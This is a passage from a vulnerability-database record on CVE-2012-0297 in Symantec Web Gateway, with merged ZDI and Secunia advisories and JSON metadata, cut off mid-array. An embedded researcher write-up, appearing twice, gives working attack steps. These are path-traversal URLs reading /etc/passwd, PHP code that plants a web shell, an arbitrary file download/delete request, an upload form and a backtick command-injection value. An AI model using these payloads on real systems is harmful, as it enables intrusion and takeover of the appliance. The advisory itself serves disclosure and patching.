var-201205-0220
Vulnerability from variot

The management GUI in Symantec Web Gateway 5.0.x before 5.0.3 does not properly restrict access to application scripts, which allows remote attackers to execute arbitrary code by (1) injecting crafted data or (2) including crafted data. Authentication is not required to exploit this vulnerability. The specific flaw exists due to insufficiently filtered user-supplied data used in a call to exec() in multiple script pages. The affected scripts are located in '/spywall/ipchange.php' and 'network.php'. There is also a flaw in '/spywall/download_file.php' that allows unauthenticated users to download and delete any file on the server. Symantec Web Gateway is a Web security gateway hardware appliance. Due to weak validation and lack of filtering of user control input, an attacker can inject arbitrary code into an application script and execute it with application privileges. Successful exploits will result in the execution of arbitrary attack-supplied commands in the context of the affected application. Symantec Web Gateway (SWG) is a set of network content filtering software developed by Symantec Corporation of the United States. The software provides web content filtering, data loss prevention, and more. Software: Symantec Web Gateway Current Software Version: 5.0.2.8 Product homepage: www.symantec.com Author: S2 Crew [Hungary] CVE: CVE-2012-0297, CVE-2012-0298, ???

File include: https://192.168.82.207/spywall/previewProxyError.php?err=../../../../../../../../etc/passwd

File include and OS command execution: http://192.168.82.207/spywall/releasenotes.php?relfile=../../../../../../etc/passwd You can execute OS commands just include the error_log: /usr/local/apache2/logs/ -rw-r--r-- 1 root root 5925 Nov 15 07:25 access_log -rw-r--r-- 1 root root 3460 Nov 15 07:21 error_log

    Make a connection to port 80:
    <?php
    $f = fopen('/var/www/html/spywall/cleaner/cmd.php','w');
    $cmd = "<?php system(\$_GET['cmd']); ?>";
    fputs($f,$cmd);
    fclose($f);
    print "Shell creation done<br>";
    ?>

Arbitary file download and delete: https://192.168.82.207/spywall/download_file.php?d=/tmp/addroutelog&name=addroutelog d parameter: the complete filename After the download process application removes the original file with root access! :)

    Command execution methods:
    1.Method
    Download and delete the /var/www/html/ciu/.htaccess file. 
    After it you can access the ciu interface on web. 
    There is an upload script: /ciu/uploadFile.php
User can control the filename and the upload location:
    $_FILES['uploadFile'];
    $_POST['uploadLocation'];

    2.Method
    <form action="https://192.168.82.192/ciu/remoteRepairs.php" method="POST" enctype="multipart/form-data">
    <input type="file" name="uploadFile">
    <input type="text" name="action" value="upload">
    <input type="text" name="uploadLocation" value="/var/www/html/spywall/cleaner/">
    <input type="hidden" name="configuration" value="test">
    <input type="submit" value="upload!">
    </form>

The "/var/www/html/spywall/cleaner" is writeable by www-data.

Command execution after authentication:

    http://192.168.82.207/spywall/adminConfig.php (this is deprecated config file, it should be remove)

    From the modified POST message:
    Content-Disposition: form-data; name="pingaddress"
    127.0.0.1`whoami>/tmp/1234.txt`

.

  • -- Vendor Response:

Symantec has issued an update to correct this vulnerability.

Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi

-----BEGIN PGP SIGNATURE----- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8

wsBVAwUBT9JkrlVtgMGTo1scAQK0Bwf+Ns64PZhwAAyfloBVx8Pb/6DTVjd8g1yp Xi5ynP006/9fLSnI2UACJdFJqUj0MPM6YUuOgpsGfncxVYVAc96pawv3pxfsfwfm kkAo2aUPIsx4xQP3Mtz3YNpWb8jl/L1SUiNLu4ogKhuA1y82gXIRot4wNq9s0DWr 11d8pTUgHJtPnlH43bWAvzqnnsf0OapaePuHEfOArEZK5kUBangirZSOyYiH+zfG Axl29pM2pLEC2ZNtJ/rbEaQhrG1chwt9+QIiQWRb5Z0V7FssO1M6AduMF7D71LoF HxgfwMBHPTlGJoWYb3LovAfDrlbeJm5sQGIabUha4TNUnAuInSURBQ== =fH5n -----END PGP SIGNATURE-----

. ----------------------------------------------------------------------

Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch


TITLE: Symantec Web Gateway Multiple Vulnerabilities

SECUNIA ADVISORY ID: SA49216

VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/49216/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=49216

RELEASE DATE: 2012-05-18

DISCUSS ADVISORY: http://secunia.com/advisories/49216/#comments

AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)

http://secunia.com/advisories/49216/

ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS

https://ca.secunia.com/?page=viewadvisory&vuln_id=49216

ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING

http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/

DESCRIPTION: Multiple vulnerabilities have been reported in Symantec Web Gateway, which can be exploited by malicious people to disclose potentially sensitive information, conduct cross-site scripting attacks, manipulate certain data, and compromise a vulnerable system.

1) An unspecified error can be exploited to inject arbitrary commands. No further information is currently available.

2) Certain unspecified input is not properly verified before being used to include files. This can be exploited to include arbitrary files from local or external resources.

3) Certain unspecified input is not properly verified before being used to download or delete arbitrary files. This can be exploited to remove or disclose the contents of arbitrary files.

4) Certain unspecified input is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

The vulnerabilities are reported in versions prior to 5.0.3.

SOLUTION: Update to version 5.0.3.

PROVIDED AND/OR DISCOVERED BY: 1-3) The vendor credits Tenable Network Security via ZDI and an anonymous person via SecuriTeam Secure Disclosure. 4) The vendor credits Ajay Pal Singh Atwal and an anonymous person.

ORIGINAL ADVISORY: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00

OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/

DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/

EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/

EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/

EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/


About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.

Subscribe: http://secunia.com/advisories/secunia_security_advisories/

Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/

Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.


Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org


Show details on source website


{
  "affected_products": {
    "_id": null,
    "data": [
      {
        "_id": null,
        "model": "web gateway",
        "scope": "eq",
        "trust": 2.5,
        "vendor": "symantec",
        "version": "5.0"
      },
      {
        "_id": null,
        "model": "web gateway",
        "scope": "eq",
        "trust": 2.5,
        "vendor": "symantec",
        "version": "5.0.1"
      },
      {
        "_id": null,
        "model": "web gateway",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "symantec",
        "version": "5.0.2"
      },
      {
        "_id": null,
        "model": "web gateway",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "symantec",
        "version": "5.0.3"
      },
      {
        "_id": null,
        "model": "web gateway",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "symantec",
        "version": "5.0.x"
      },
      {
        "_id": null,
        "model": "web gateway",
        "scope": null,
        "trust": 0.7,
        "vendor": "symantec",
        "version": null
      },
      {
        "_id": null,
        "model": "web gateway",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "symantec",
        "version": "5.0.3"
      }
    ],
    "sources": [
      {
        "db": "ZDI",
        "id": "ZDI-12-090"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-2638"
      },
      {
        "db": "BID",
        "id": "53444"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-002472"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201205-332"
      },
      {
        "db": "NVD",
        "id": "CVE-2012-0297"
      }
    ]
  },
  "configurations": {
    "_id": null,
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/a:symantec:web_gateway",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-002472"
      }
    ]
  },
  "credits": {
    "_id": null,
    "data": "An anonymous contributor working with Beyond Security\u0027s SecuriTeam Secure Disclosure project",
    "sources": [
      {
        "db": "BID",
        "id": "53444"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201205-332"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2012-0297",
  "cvss": {
    "_id": null,
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CVE-2012-0297",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 1.8,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "ZDI",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CVE-2012-0297",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "HIGH",
            "trust": 0.7,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "VHN-53578",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2012-0297",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "CVE-2012-0297",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "ZDI",
            "id": "CVE-2012-0297",
            "trust": 0.7,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201205-332",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULHUB",
            "id": "VHN-53578",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "ZDI",
        "id": "ZDI-12-090"
      },
      {
        "db": "VULHUB",
        "id": "VHN-53578"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-002472"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201205-332"
      },
      {
        "db": "NVD",
        "id": "CVE-2012-0297"
      }
    ]
  },
  "description": {
    "_id": null,
    "data": "The management GUI in Symantec Web Gateway 5.0.x before 5.0.3 does not properly restrict access to application scripts, which allows remote attackers to execute arbitrary code by (1) injecting crafted data or (2) including crafted data. Authentication is not required to exploit this vulnerability. The specific flaw exists due to insufficiently filtered user-supplied data used in a call to exec() in multiple script pages. The affected scripts are located in \u0027/spywall/ipchange.php\u0027 and \u0027network.php\u0027. There is also a flaw in \u0027/spywall/download_file.php\u0027 that allows unauthenticated users to download and delete any file on the server. Symantec Web Gateway is a Web security gateway hardware appliance. Due to weak validation and lack of filtering of user control input, an attacker can inject arbitrary code into an application script and execute it with application privileges. \nSuccessful exploits will result in the execution of arbitrary attack-supplied commands in the context of the affected application. Symantec Web Gateway (SWG) is a set of network content filtering software developed by Symantec Corporation of the United States. The software provides web content filtering, data loss prevention, and more. Software: Symantec Web Gateway\nCurrent Software Version: 5.0.2.8\nProduct homepage: www.symantec.com\nAuthor: S2 Crew [Hungary]\nCVE: CVE-2012-0297, CVE-2012-0298, ???\n \nFile include:\n        https://192.168.82.207/spywall/previewProxyError.php?err=../../../../../../../../etc/passwd\n \nFile include and OS command execution:\n        http://192.168.82.207/spywall/releasenotes.php?relfile=../../../../../../etc/passwd\n        You can execute OS commands just include the error_log:\n        /usr/local/apache2/logs/\n        -rw-r--r--   1 root   root  5925 Nov 15 07:25 access_log\n        -rw-r--r--   1 root   root  3460 Nov 15 07:21 error_log\n \n        Make a connection to port 80:\n        \u003c?php\n        $f = fopen(\u0027/var/www/html/spywall/cleaner/cmd.php\u0027,\u0027w\u0027);\n        $cmd = \"\u003c?php system(\\$_GET[\u0027cmd\u0027]); ?\u003e\";\n        fputs($f,$cmd);\n        fclose($f);\n        print \"Shell creation done\u003cbr\u003e\";\n        ?\u003e\n \nArbitary file download and delete:\n        https://192.168.82.207/spywall/download_file.php?d=/tmp/addroutelog\u0026name=addroutelog\n    d parameter: the complete filename\n        After the download process application removes the original file with root access! :)\n \n        Command execution methods:\n        1.Method\n        Download and delete the /var/www/html/ciu/.htaccess file. \n        After it you can access the ciu interface on web. \n        There is an upload script: /ciu/uploadFile.php\n    User can control the filename and the upload location:\n        $_FILES[\u0027uploadFile\u0027];\n        $_POST[\u0027uploadLocation\u0027];\n \n        2.Method\n        \u003cform action=\"https://192.168.82.192/ciu/remoteRepairs.php\" method=\"POST\" enctype=\"multipart/form-data\"\u003e\n        \u003cinput type=\"file\" name=\"uploadFile\"\u003e\n        \u003cinput type=\"text\" name=\"action\" value=\"upload\"\u003e\n        \u003cinput type=\"text\" name=\"uploadLocation\" value=\"/var/www/html/spywall/cleaner/\"\u003e\n        \u003cinput type=\"hidden\" name=\"configuration\" value=\"test\"\u003e\n        \u003cinput type=\"submit\" value=\"upload!\"\u003e\n        \u003c/form\u003e\n     \n    The \"/var/www/html/spywall/cleaner\" is writeable by www-data. \n \nCommand execution after authentication:\n \n        http://192.168.82.207/spywall/adminConfig.php (this is deprecated config file, it should be remove)\n \n        From the modified POST message:\n        Content-Disposition: form-data; name=\"pingaddress\"\n        127.0.0.1`whoami\u003e/tmp/1234.txt`\n\n. \n\n- -- Vendor Response:\n\nSymantec has issued an update to correct this vulnerability. \n\nResearchers interested in getting paid for their security research\nthrough the ZDI can find more information and sign-up at:\n\n    http://www.zerodayinitiative.com\n\nThe ZDI is unique in how the acquired vulnerability information is\nused. Instead, upon notifying the affected product vendor,\nTippingPoint provides its customers with zero day protection through\nits intrusion prevention technology. Explicit details regarding the\nspecifics of the vulnerability are not exposed to any parties until\nan official vendor patch is publicly available. Furthermore, with the\naltruistic aim of helping to secure a broader user base, TippingPoint\nprovides this vulnerability information confidentially to security\nvendors (including competitors) who have a vulnerability protection or\nmitigation product. \n\nOur vulnerability disclosure policy is available online at:\n\n    http://www.zerodayinitiative.com/advisories/disclosure_policy/\n\nFollow the ZDI on Twitter:\n\n    http://twitter.com/thezdi\n\n-----BEGIN PGP SIGNATURE-----\nVersion: PGP Desktop 10.2.0 (Build 1950)\nCharset: utf-8\n\nwsBVAwUBT9JkrlVtgMGTo1scAQK0Bwf+Ns64PZhwAAyfloBVx8Pb/6DTVjd8g1yp\nXi5ynP006/9fLSnI2UACJdFJqUj0MPM6YUuOgpsGfncxVYVAc96pawv3pxfsfwfm\nkkAo2aUPIsx4xQP3Mtz3YNpWb8jl/L1SUiNLu4ogKhuA1y82gXIRot4wNq9s0DWr\n11d8pTUgHJtPnlH43bWAvzqnnsf0OapaePuHEfOArEZK5kUBangirZSOyYiH+zfG\nAxl29pM2pLEC2ZNtJ/rbEaQhrG1chwt9+QIiQWRb5Z0V7FssO1M6AduMF7D71LoF\nHxgfwMBHPTlGJoWYb3LovAfDrlbeJm5sQGIabUha4TNUnAuInSURBQ==\n=fH5n\n-----END PGP SIGNATURE-----\n\n. ----------------------------------------------------------------------\n\nBecome a PSI 3.0 beta tester!\nTest-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. \nDownload it here!\nhttp://secunia.com/psi_30_beta_launch\n\n----------------------------------------------------------------------\n\nTITLE:\nSymantec Web Gateway Multiple Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA49216\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/49216/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=49216\n\nRELEASE DATE:\n2012-05-18\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/49216/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/49216/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=49216\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nMultiple vulnerabilities have been reported in Symantec Web Gateway,\nwhich can be exploited by malicious people to disclose potentially\nsensitive information, conduct cross-site scripting attacks,\nmanipulate certain data, and compromise a vulnerable system. \n\n1) An unspecified error can be exploited to inject arbitrary\ncommands. No further information is currently available. \n\n2) Certain unspecified input is not properly verified before being\nused to include files. This can be exploited to include arbitrary\nfiles from local or external resources. \n\n3) Certain unspecified input is not properly verified before being\nused to download or delete arbitrary files. This can be exploited to\nremove or disclose the contents of arbitrary files. \n\n4) Certain unspecified input is not properly sanitised before being\nreturned to the user. This can be exploited to execute arbitrary HTML\nand script code in a user\u0027s browser session in context of an affected\nsite. \n\nThe vulnerabilities are reported in versions prior to 5.0.3. \n\nSOLUTION:\nUpdate to version 5.0.3. \n\nPROVIDED AND/OR DISCOVERED BY:\n1-3) The vendor credits Tenable Network Security via ZDI and an\nanonymous person via SecuriTeam Secure Disclosure. \n4) The vendor credits Ajay Pal Singh Atwal and an anonymous person. \n\nORIGINAL ADVISORY:\nhttp://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory\u0026pvid=security_advisory\u0026year=2012\u0026suid=20120517_00\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2012-0297"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-002472"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-090"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-2638"
      },
      {
        "db": "BID",
        "id": "53444"
      },
      {
        "db": "VULHUB",
        "id": "VHN-53578"
      },
      {
        "db": "PACKETSTORM",
        "id": "114231"
      },
      {
        "db": "PACKETSTORM",
        "id": "113446"
      },
      {
        "db": "PACKETSTORM",
        "id": "112876"
      }
    ],
    "trust": 3.42
  },
  "exploit_availability": {
    "_id": null,
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-53578",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-53578"
      }
    ]
  },
  "external_ids": {
    "_id": null,
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2012-0297",
        "trust": 4.3
      },
      {
        "db": "BID",
        "id": "53444",
        "trust": 2.0
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-090",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-002472",
        "trust": 0.8
      },
      {
        "db": "ZDI_CAN",
        "id": "ZDI-CAN-1435",
        "trust": 0.7
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201205-332",
        "trust": 0.7
      },
      {
        "db": "SECUNIA",
        "id": "49216",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-2638",
        "trust": 0.6
      },
      {
        "db": "NSFOCUS",
        "id": "19664",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "114231",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "113446",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "113090",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "113485",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "113050",
        "trust": 0.1
      },
      {
        "db": "SEEBUG",
        "id": "SSVID-73035",
        "trust": 0.1
      },
      {
        "db": "SEEBUG",
        "id": "SSVID-72928",
        "trust": 0.1
      },
      {
        "db": "SEEBUG",
        "id": "SSVID-72934",
        "trust": 0.1
      },
      {
        "db": "SEEBUG",
        "id": "SSVID-73332",
        "trust": 0.1
      },
      {
        "db": "EXPLOIT-DB",
        "id": "18942",
        "trust": 0.1
      },
      {
        "db": "EXPLOIT-DB",
        "id": "19065",
        "trust": 0.1
      },
      {
        "db": "EXPLOIT-DB",
        "id": "18932",
        "trust": 0.1
      },
      {
        "db": "EXPLOIT-DB",
        "id": "19406",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-53578",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "112876",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "ZDI",
        "id": "ZDI-12-090"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-2638"
      },
      {
        "db": "VULHUB",
        "id": "VHN-53578"
      },
      {
        "db": "BID",
        "id": "53444"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-002472"
      },
      {
        "db": "PACKETSTORM",
        "id": "114231"
      },
      {
        "db": "PACKETSTORM",
        "id": "113446"
      },
      {
        "db": "PACKETSTORM",
        "id": "112876"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201205-332"
      },
      {
        "db": "NVD",
        "id": "CVE-2012-0297"
      }
    ]
  },
  "id": "VAR-201205-0220",
  "iot": {
    "_id": null,
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2012-2638"
      },
      {
        "db": "VULHUB",
        "id": "VHN-53578"
      }
    ],
    "trust": 0.06999999999999999
  },
  "iot_taxonomy": {
    "_id": null,
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2012-2638"
      }
    ]
  },
  "last_update_date": "2024-11-23T22:23:24.168000Z",
  "patch": {
    "_id": null,
    "data": [
      {
        "title": "SYM12-006",
        "trust": 1.5,
        "url": "http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory\u0026pvid=security_advisory\u0026year=2012\u0026suid=20120517_00"
      },
      {
        "title": "SYM12-006",
        "trust": 0.8,
        "url": "http://www.symantec.com/ja/jp/security_response/securityupdates/detail.jsp?fid=security_advisory\u0026pvid=security_advisory\u0026year=2012\u0026suid=20120517_00"
      },
      {
        "title": "Patch for Symantec Web Gateway remote shell command execution vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/17131"
      }
    ],
    "sources": [
      {
        "db": "ZDI",
        "id": "ZDI-12-090"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-2638"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-002472"
      }
    ]
  },
  "problemtype_data": {
    "_id": null,
    "data": [
      {
        "problemtype": "CWE-264",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-53578"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-002472"
      },
      {
        "db": "NVD",
        "id": "CVE-2012-0297"
      }
    ]
  },
  "references": {
    "_id": null,
    "data": [
      {
        "trust": 2.7,
        "url": "http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory\u0026pvid=security_advisory\u0026year=2012\u0026suid=20120517_00"
      },
      {
        "trust": 1.7,
        "url": "http://www.securityfocus.com/bid/53444"
      },
      {
        "trust": 1.1,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/75731"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-0297"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-0297"
      },
      {
        "trust": 0.6,
        "url": "http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/49216"
      },
      {
        "trust": 0.6,
        "url": "http://www.nsfocus.net/vulndb/19664"
      },
      {
        "trust": 0.3,
        "url": "http://www.symantec.com/business/web-gateway"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0297"
      },
      {
        "trust": 0.1,
        "url": "http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory\u0026amp;pvid=security_advisory\u0026amp;year=2012\u0026amp;suid=20120517_00"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0298"
      },
      {
        "trust": 0.1,
        "url": "https://192.168.82.207/spywall/previewproxyerror.php?err=../../../../../../../../etc/passwd"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.82.207/spywall/releasenotes.php?relfile=../../../../../../etc/passwd"
      },
      {
        "trust": 0.1,
        "url": "https://www.symantec.com"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.82.207/spywall/adminconfig.php"
      },
      {
        "trust": 0.1,
        "url": "https://192.168.82.207/spywall/download_file.php?d=/tmp/addroutelog\u0026name=addroutelog"
      },
      {
        "trust": 0.1,
        "url": "https://192.168.82.192/ciu/remoterepairs.php\""
      },
      {
        "trust": 0.1,
        "url": "http://www.zerodayinitiative.com/advisories/disclosure_policy/"
      },
      {
        "trust": 0.1,
        "url": "http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=se"
      },
      {
        "trust": 0.1,
        "url": "http://twitter.com/thezdi"
      },
      {
        "trust": 0.1,
        "url": "http://www.zerodayinitiative.com"
      },
      {
        "trust": 0.1,
        "url": "http://www.zerodayinitiative.com/advisories/zdi-12-090"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/49216/"
      },
      {
        "trust": 0.1,
        "url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=49216"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/49216/#comments"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/psi_30_beta_launch"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/vulnerability_intelligence/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/secunia_security_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/vulnerability_scanning/personal/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/about_secunia_advisories/"
      }
    ],
    "sources": [
      {
        "db": "ZDI",
        "id": "ZDI-12-090"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-2638"
      },
      {
        "db": "VULHUB",
        "id": "VHN-53578"
      },
      {
        "db": "BID",
        "id": "53444"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-002472"
      },
      {
